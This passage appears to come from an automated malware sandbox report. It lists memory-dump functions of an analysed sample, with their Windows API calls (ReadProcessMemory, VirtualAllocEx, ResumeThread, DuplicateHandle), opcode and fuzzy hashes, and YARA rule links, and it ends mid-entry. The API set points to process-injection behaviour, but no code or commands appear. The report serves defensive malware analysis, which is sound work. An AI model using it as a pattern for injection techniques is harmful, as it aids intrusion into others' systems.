                                                                            • API String ID: 1591575202-0
                                                                            • Opcode ID: f2d7d6ddd76d059fcc6b836bfb104d39e380214e076d11af2b25964438274cb6
                                                                            • Instruction ID: a74b4730cf53b51421ae80e614cc0bb7b95139a8da1dc70d352ec5bae8f34dc3
                                                                            • Opcode Fuzzy Hash: f2d7d6ddd76d059fcc6b836bfb104d39e380214e076d11af2b25964438274cb6
                                                                            • Instruction Fuzzy Hash: CD2137B1D003098FDB10DFAAC9857EEBBF4AB48224F14842AD519A7640DB78A944CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 074FEBB0, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 074FEC30
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243296408.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: MemoryProcessRead
                                                                            • String ID:
                                                                            • API String ID: 1726664587-0
                                                                            • Opcode ID: 25ae77e4d183c912b7d6582454aa9579db67fdbe878d5102ffd1e56801adce52
                                                                            • Instruction ID: b34567697b5b4bbe7c8fe65838f672b2755b1f0400c3e9997ef379a86228ef7a
                                                                            • Opcode Fuzzy Hash: 25ae77e4d183c912b7d6582454aa9579db67fdbe878d5102ffd1e56801adce52
                                                                            • Instruction Fuzzy Hash: 472114B1C003599FCB10DFA9C980BEEBBF5FF48324F54882AE559A7250D7789950CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0106C3B8, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0106C43F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.239032087.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: acb7d60068c99a54da8231bbddeef59f5702dc76c3231c1a667257493f1a5ca7
                                                                            • Instruction ID: 55d1a5eedf9cc04628a5d5e326432a029d1807318358f35ffbd013f9dcb25c14
                                                                            • Opcode Fuzzy Hash: acb7d60068c99a54da8231bbddeef59f5702dc76c3231c1a667257493f1a5ca7
                                                                            • Instruction Fuzzy Hash: 5221C4B5D002489FDB10CFA9D984AEEBBF8FB48324F14841AE955A7310D778A954CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0106C3B1, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0106C43F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.239032087.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: 44bc7ac6303e17ca2a51dcf81780705ee78489a1766e0775006d43418e6f11d9
                                                                            • Instruction ID: 0c5685baa34caecb16f62837ac00f5bdaa90e15e3251af01b7cc1c11ca021dcc
                                                                            • Opcode Fuzzy Hash: 44bc7ac6303e17ca2a51dcf81780705ee78489a1766e0775006d43418e6f11d9
                                                                            • Instruction Fuzzy Hash: 6221E3B5D002089FDB10CFA9D985BEEBBF8FB48324F14841AE955A3310D378A954CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0106A309, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0106A169,00000800,00000000,00000000), ref: 0106A37A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.239032087.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 3bc3e56afbbd357c12aa8dd6e05fdd32a0068c1d8e4405a1b04985c9fa57fb9f
                                                                            • Instruction ID: edd56dfc4dce8eb2776adb6146e20890a25686ecd9733239f41c4716d7b30762
                                                                            • Opcode Fuzzy Hash: 3bc3e56afbbd357c12aa8dd6e05fdd32a0068c1d8e4405a1b04985c9fa57fb9f
                                                                            • Instruction Fuzzy Hash: 9E1117B6D00219CFDB10CF9AD584ADEFBF8EB48324F14842AD459B7600C774A545CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010691D0, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0106A169,00000800,00000000,00000000), ref: 0106A37A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.239032087.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 4ebd977293f3db57b384de5a8a5da41e83a008ac939ae570ffd7cbea33785f2a
                                                                            • Instruction ID: 1e749099853b0a0b77d86017564f2ddcb59939f879ec40d4cac09c0493494a3c
                                                                            • Opcode Fuzzy Hash: 4ebd977293f3db57b384de5a8a5da41e83a008ac939ae570ffd7cbea33785f2a
                                                                            • Instruction Fuzzy Hash: 741103B6D00208DFDB10DF9AC944ADEFBF8EB48324F14842AE559B7600C3B5A945CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 074FE960, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 074FE9CE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243296408.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 09a76f40b162f188116398f6095b9c9ed25922e6ca70fcd00046f32bb867ece8
                                                                            • Instruction ID: 54b49719a8ef7b2a81501866fd0dd739b53e092df9f2cea379ea50eed721c2cb
                                                                            • Opcode Fuzzy Hash: 09a76f40b162f188116398f6095b9c9ed25922e6ca70fcd00046f32bb867ece8
                                                                            • Instruction Fuzzy Hash: AE1167B18002099FCB10DFA9C844BEFBBF5EF48328F14882AE515A7250CB75A950CFA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 074FE648, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243296408.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: ResumeThread
                                                                            • String ID:
                                                                            • API String ID: 947044025-0
                                                                            • Opcode ID: 40623412748adbe97492830e590f625b18bdece6dfafe4e23a61c39edbda848d
                                                                            • Instruction ID: d840bef199969060afc27d2c092fcc674a44fbaa8fa297fc8068110599604a10
                                                                            • Opcode Fuzzy Hash: 40623412748adbe97492830e590f625b18bdece6dfafe4e23a61c39edbda848d
                                                                            • Instruction Fuzzy Hash: 80113DB1D003488BDB14DFA9C9457DFFBF5AB48324F148829D515A7350CB74A944CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0106A088, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0106A0EE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.239032087.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 2cc0a48a4ef1ae93eade526cf5aceb16c7e5ba9a86e72fb228869d6a06a803fe
                                                                            • Instruction ID: 2e904033cee3196634ed764819c760e32dd7f833cbff46fc548f97f01f3ca221
                                                                            • Opcode Fuzzy Hash: 2cc0a48a4ef1ae93eade526cf5aceb16c7e5ba9a86e72fb228869d6a06a803fe
                                                                            • Instruction Fuzzy Hash: 721102B6D002498FDB10DF9AC944BDEFBF8AB48324F14845AD859B7600D379A545CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 081017E8, Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PostMessageW.USER32(?,?,?,?), ref: 0810184D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243650623.0000000008100000.00000040.00000001.sdmp, Offset: 08100000, based on PE: false
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            • String ID:
                                                                            • API String ID: 410705778-0
                                                                            • Opcode ID: c6a8af8cfb9400468a71565fbc28666ad6a829163f40b4ec3a7b23b6eb3c4c8c
                                                                            • Instruction ID: 728d58fe8a5cbd84c032b37e26e4a07fa356fd5feb02624309eee5949ed6753b
                                                                            • Opcode Fuzzy Hash: c6a8af8cfb9400468a71565fbc28666ad6a829163f40b4ec3a7b23b6eb3c4c8c
                                                                            • Instruction Fuzzy Hash: 3B1103B5C002499FDB10CF99CA85BDEBBF8FB48324F14881AD955B7640C378A554CFA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 081017F0, Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PostMessageW.USER32(?,?,?,?), ref: 0810184D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243650623.0000000008100000.00000040.00000001.sdmp, Offset: 08100000, based on PE: false
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            • String ID:
                                                                            • API String ID: 410705778-0
                                                                            • Opcode ID: 8331c5983255a724a196651132d4d4ecec6ac7267ce9418ce2342c7b73498ea5
                                                                            • Instruction ID: c25a9bd24600adf489b90151e0da8f30b26c1e0c0c908043918eb7699979d9fe
                                                                            • Opcode Fuzzy Hash: 8331c5983255a724a196651132d4d4ecec6ac7267ce9418ce2342c7b73498ea5
                                                                            • Instruction Fuzzy Hash: 1E1103B58002489FDB10CF99C985BDEBBF8FB48324F10841AD515A7600C378A954CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07732F51, Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $%m
                                                                            • API String ID: 0-111698852
                                                                            • Opcode ID: 8834d8aa6952d798410a4fb2dcafb546a0fdd95679d63a9245e87423b6ed7286
                                                                            • Instruction ID: e6fac5ed8d1deef8b41817d8e65fc1ff95bc58e73c635d27324c9a8398a55ecd
                                                                            • Opcode Fuzzy Hash: 8834d8aa6952d798410a4fb2dcafb546a0fdd95679d63a9245e87423b6ed7286
                                                                            • Instruction Fuzzy Hash: C201F7B07006168BCB24D725D510A7AB3EAAFC2254B14C97ED4468B2A7CF71D802CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07732EC9, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $%m
                                                                            • API String ID: 0-111698852
                                                                            • Opcode ID: 012a88d2c37921db5f15338246aa790872abf3c17ca8618e71b7fe5e02a7bff5
                                                                            • Instruction ID: 25a75cdc00b208c9625627518545890837c56455e317fa8381f16314e6cea896
                                                                            • Opcode Fuzzy Hash: 012a88d2c37921db5f15338246aa790872abf3c17ca8618e71b7fe5e02a7bff5
                                                                            • Instruction Fuzzy Hash: F801F270305A028FCB24DB68D514E2677E9FF86354B15C8BED1098B226CF72EC02CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07732ED8, Relevance: 1.3, Strings: 1, Instructions: 41COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $%m
                                                                            • API String ID: 0-111698852
                                                                            • Opcode ID: b7c8d1ef88e8f1bf9b941a03dbd3b809a26514ca91cd2a5527736ae3bbae38f8
                                                                            • Instruction ID: 78ddfab06eb6f57131185b0c42b3e72206d3724f8a7d416bfa8ec54db943173a
                                                                            • Opcode Fuzzy Hash: b7c8d1ef88e8f1bf9b941a03dbd3b809a26514ca91cd2a5527736ae3bbae38f8
                                                                            • Instruction Fuzzy Hash: A301AD703006028FC728DB59C514D26B3EAFF86254B11C8BAD50A8B226CF71EC02CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 077330B0, Relevance: .8, Instructions: 779COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8d519e64a23a064102119b9a048419ea64853b97641bf5c97ef6f020f7ddafe8
                                                                            • Instruction ID: 5ea37c11728db6fcb24b93a0bacd97f73b7036cd8825945f9fbfcbdddfd4c717
                                                                            • Opcode Fuzzy Hash: 8d519e64a23a064102119b9a048419ea64853b97641bf5c97ef6f020f7ddafe8
                                                                            • Instruction Fuzzy Hash: 2B6246F4D01B838ADB345F78D4893ADBAA1AB46384F105D1FD0EACB6A2DB35D481CB45
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 077330F0, Relevance: .4, Instructions: 450COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9637da02c419d182eebc6d845ae3ac237eefa185f1795830311b325016e5afdf
                                                                            • Instruction ID: 8cf9f8adb9bc441f96e1b195fcae095a88796bee33c47070496b94be363f40f8
                                                                            • Opcode Fuzzy Hash: 9637da02c419d182eebc6d845ae3ac237eefa185f1795830311b325016e5afdf
                                                                            • Instruction Fuzzy Hash: B31287F0D06F838AD7745F68858539EB690AB07398F209D1FC0FAC9266D735D0C69B49
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0773DFB8, Relevance: .3, Instructions: 272COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3d1cabcb7081019f3455529c9c430a774b275605b217ec60b1f127f3fc80dc2e
                                                                            • Instruction ID: 77084e0f08e731641128ae8b823a2df48185a63b800830f1c0e049a2cb52375f
                                                                            • Opcode Fuzzy Hash: 3d1cabcb7081019f3455529c9c430a774b275605b217ec60b1f127f3fc80dc2e
                                                                            • Instruction Fuzzy Hash: 4EB12870E002189BEB14DFA4D851BAEBBB6EF8A304F209429E505BF285CBB15D45CF19
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0773DFA8, Relevance: .3, Instructions: 265COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ef14b884dc449a58c112854739cbedbd436a849f31d59d4b83784f298dd8a822
                                                                            • Instruction ID: c522154eb6ae52583047dafee0c546ec13178c68953a72cbbb7ccb3e2dcfe72c
                                                                            • Opcode Fuzzy Hash: ef14b884dc449a58c112854739cbedbd436a849f31d59d4b83784f298dd8a822
                                                                            • Instruction Fuzzy Hash: 51A12A70E402189BDB14DFA4D851BEEBBB6EF8A304F209429E505BF285CBB15D45CF19
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07731E20, Relevance: .2, Instructions: 238COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 49b598adc10244a3390943b2c208f50836173e396083aac2e9a8ceeeea178d7a
                                                                            • Instruction ID: 618bf8370d6a1fbb8f061884f9a9e60b402915735642676c16d419a57d530746
                                                                            • Opcode Fuzzy Hash: 49b598adc10244a3390943b2c208f50836173e396083aac2e9a8ceeeea178d7a
                                                                            • Instruction Fuzzy Hash: 0691B271B006098FCB04DF79D8586AEBBF2FF88344F108829E506AB391EF359945CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07734C88, Relevance: .2, Instructions: 223COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a388aed7bf3cd8df655004904bb03ab3a1bb4e2c58744efc468b5862e0be38bd
                                                                            • Instruction ID: afaa72c71f46121c9c1c6a41d1a98a390c768d345c88026c31903ba5c0425ff4
                                                                            • Opcode Fuzzy Hash: a388aed7bf3cd8df655004904bb03ab3a1bb4e2c58744efc468b5862e0be38bd
                                                                            • Instruction Fuzzy Hash: E9A13AB4D11218CFDB08DFA9D9996AEBBF2FF49300F10846AE419A7386DB345945CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0773D340, Relevance: .2, Instructions: 211COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 336c8f46dac5e62e4d15acdef57474a04ee6bc71c6f21435ce8443ef417e4aff
                                                                            • Instruction ID: fe7902be3f446e55c5ca92e20deeb657cb5c19246332a1002761f8dfce5082fb
                                                                            • Opcode Fuzzy Hash: 336c8f46dac5e62e4d15acdef57474a04ee6bc71c6f21435ce8443ef417e4aff
                                                                            • Instruction Fuzzy Hash: 7A8103F0E15208CFEB20CFA9C5487ADBBF5BB4A384F10A46AD419B7242D7749985CF15
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07736C21, Relevance: .2, Instructions: 198COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0bbb40fb51bfff406520b0a2bc233fa4a7c93107435c1b4ca70772d1585f14e1
                                                                            • Instruction ID: 7a97578b43e3b257752696b2c6487276a0510b3fcbc44f7a54d79a59f9c75287
                                                                            • Opcode Fuzzy Hash: 0bbb40fb51bfff406520b0a2bc233fa4a7c93107435c1b4ca70772d1585f14e1
                                                                            • Instruction Fuzzy Hash: 758116B0E152099FDB04DFA9D5896AEBBF6FF4A304F10802AE409E7385DB346946CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07736C30, Relevance: .2, Instructions: 195COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 056dabebc317bc9416a29b30943fb8fee8476784a5f28e28a3400ac28e88a5ce
                                                                            • Instruction ID: 3eae74455e65aaa8b73c3562ae97b4fd286187a5e46461bf73e5178d63e80098
                                                                            • Opcode Fuzzy Hash: 056dabebc317bc9416a29b30943fb8fee8476784a5f28e28a3400ac28e88a5ce
                                                                            • Instruction Fuzzy Hash: 8A71F5B0E152099FDB04DFA9D5896AEBBF6FB4A344F10802AE409E7385DB346916CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0773E558, Relevance: .2, Instructions: 190COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 99b46587474c6c821248b6ea972c5cad331f12605649361c08edce44d2d6362e
                                                                            • Instruction ID: 8fc1661b77efba7246df8f73021e5f34583c7c4f3e61393aab3cf8f827e4cbf7
                                                                            • Opcode Fuzzy Hash: 99b46587474c6c821248b6ea972c5cad331f12605649361c08edce44d2d6362e
                                                                            • Instruction Fuzzy Hash: 718102B4E10208CFDB14DFA5D958AAEBBB6FF89304F20802AD819BB385DB705945CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0773E547, Relevance: .2, Instructions: 185COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d5ba31a3e542f0bd94ab10b60156845fccea094c127ea677ed46f20d49035b91
                                                                            • Instruction ID: da941ccbcb231112ce860bb723c0c415940787ca434b599575f6b2bb9904dc15
                                                                            • Opcode Fuzzy Hash: d5ba31a3e542f0bd94ab10b60156845fccea094c127ea677ed46f20d49035b91
                                                                            • Instruction Fuzzy Hash: 198100B4E10208CFDB14DFA5D958AADBBB6FF89300F20802AE819BB381DB305945CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 077325C0, Relevance: .2, Instructions: 171COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 79280ae1667a222eabf569b8b4c73544bd251221f11e25d0f9e4a59feabc53fd
                                                                            • Instruction ID: fff901ea20ecce57c31d88d8df7657ee21de2d01c947eaac7966084bfd7475dd
                                                                            • Opcode Fuzzy Hash: 79280ae1667a222eabf569b8b4c73544bd251221f11e25d0f9e4a59feabc53fd
                                                                            • Instruction Fuzzy Hash: D071AE74A01209EFCB15DF69D884DAEBBB6BF49754F114498F901AB762CB31EC81CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 077305C8, Relevance: .2, Instructions: 165COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4b36498e65056f3339370656b773214e58faa0b314f9b56dc04961505c930b29
                                                                            • Instruction ID: 1ba7987e61a9ca9b3204f65761920b9c6d83dd47c891786b43fb318f6265dcdc
                                                                            • Opcode Fuzzy Hash: 4b36498e65056f3339370656b773214e58faa0b314f9b56dc04961505c930b29
                                                                            • Instruction Fuzzy Hash: 1141C2B5A11218DFCF04DFB0E9586EEBBB6FF89305F11846AE441A7252DB349855CB80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07737644, Relevance: .2, Instructions: 151COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6c66f71a873ca625ccb8d778214cc606db07a7cbe39b30fdc6dc1b3906749004
                                                                            • Instruction ID: af77a3a96e1f9890b0fa40d49880ad98c0a834eb5377f3a5ebad3aec49b73608
                                                                            • Opcode Fuzzy Hash: 6c66f71a873ca625ccb8d778214cc606db07a7cbe39b30fdc6dc1b3906749004
                                                                            • Instruction Fuzzy Hash: DF41D2B5B002058FCB05EB78D8889BEBBF6EFC43647158969E419DB391EF309D0587A1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07731880, Relevance: .1, Instructions: 127COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3456439cd93c146e5ab8ab04a2686179d9c43c9f8ad3f148d09d9dcb861678f0
                                                                            • Instruction ID: b689b2699d22cefe0c3b54248103a5b0924f4fc95d376dbd15cd8cc4b46a104b
                                                                            • Opcode Fuzzy Hash: 3456439cd93c146e5ab8ab04a2686179d9c43c9f8ad3f148d09d9dcb861678f0
                                                                            • Instruction Fuzzy Hash: 0E417BB0B146598FCB04DBAAC884EADBBF6BF49644F5140A9E501EB362DB31DC00CB21
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0773D82F, Relevance: .1, Instructions: 120COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: aa04c4f54b7cec8ce57c6d874f9d8113c507c2778133862cba415d73e2a77155
                                                                            • Instruction ID: 946e2dfc959f141d0948714e62f1b66843d81fc93873cb5d367ab41aceb18914
                                                                            • Opcode Fuzzy Hash: aa04c4f54b7cec8ce57c6d874f9d8113c507c2778133862cba415d73e2a77155
                                                                            • Instruction Fuzzy Hash: 06419CB0F16208DBCB28CFA9E8816EDBBB6EF8A355F109439E405B7291DB305845CF15
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07731A90, Relevance: .1, Instructions: 118COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e015a08b3eb9d85e3fc48b2b2639d79928b5d250456226d79e2be96cc7a11ced
                                                                            • Instruction ID: 72d0f20bb03ac0819041b8de0f4628a508a900f0b3447270e5fb91677fdfe0d5
                                                                            • Opcode Fuzzy Hash: e015a08b3eb9d85e3fc48b2b2639d79928b5d250456226d79e2be96cc7a11ced
                                                                            • Instruction Fuzzy Hash: 3941F774A006198FDB04EBA8C844BDD77F6FF49744F1144A9E905AB7A2DB75A801CFA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07738FA3, Relevance: .1, Instructions: 108COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8e64d611b0e2e186d01a39a1a029e27ad0a417683a4de027f3d27403ae064378
                                                                            • Instruction ID: e989cae858814998064bd4615095513ea7c5fbbb5fda68a3a20e4746a9e0e4ac
                                                                            • Opcode Fuzzy Hash: 8e64d611b0e2e186d01a39a1a029e27ad0a417683a4de027f3d27403ae064378
                                                                            • Instruction Fuzzy Hash: 24416CB0E04219CFDB14CF66D9447EEBBB2EF8A344F04C0AAD508AB245CB711A85CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 077344B0, Relevance: .1, Instructions: 105COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
